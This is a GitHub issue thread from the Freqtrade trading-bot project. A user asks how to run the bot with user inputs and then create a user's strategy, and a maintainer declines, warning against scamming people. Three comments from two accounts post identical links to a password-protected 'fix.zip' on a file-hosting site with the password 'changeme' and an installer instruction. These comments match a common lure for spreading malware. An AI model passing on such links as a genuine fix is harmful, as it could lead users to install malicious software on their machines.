### ISSUE TITLE
In Freqtrade bot, how can we bypass the default in-built strategy ? How can we adhere or implement the following procedure strictly in the given sequence/order  as sought by the client viz.: a) Execute the bot with user's inputs and thereafter b) Create the user's strategy ?

### ISSUE THREAD

**Issue by shubhamraut41** [freqtrade/freqtrade#10583]
## Describe your environment

  * Operating system: ____
  * Python Version: _____ (`python -V`)
  * CCXT version: _____ (`pip freeze | grep ccxt`)
  * Freqtrade Version: ____ (`freqtrade -V` or `docker compose run --rm freqtrade -V` for Freqtrade running in docker)
  
## Your question

*Ask the question you have not been able to find an answer in the [Documentation](https://www.freqtrade.io/en/latest/)*

**Comment by Superming997** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by xmatthias** [comment]
Please get used to filling out the issue template.  Those who frequently omit the template may have their issues closed without comment.
We're asking some very basic questions - by deleting the issue template, you're explicitly choosing not to answer our questions.

Filling out the template helps reduce our workload, and we greatly appreciate that.

---

Also, please put your actual question in the content, not the title, which should be a concise title, not multiple sentences.


As for your question, freqtrade is aimed at personal accounts.
Well not support usecases trying to provide this to users, which your question clearly aims at.
Finding a good strategy takes way more than "accept some user inputs, write strategy".

Considering that's your second issue in this direction, please stop. 
Its clear that you're trying to set up freqtrade for users without having the least understanding how freqtrade works.
Well not support you scamming people out of their money.
Thanks for your understanding.

**Comment by WSA1k** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by WSA1k** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."
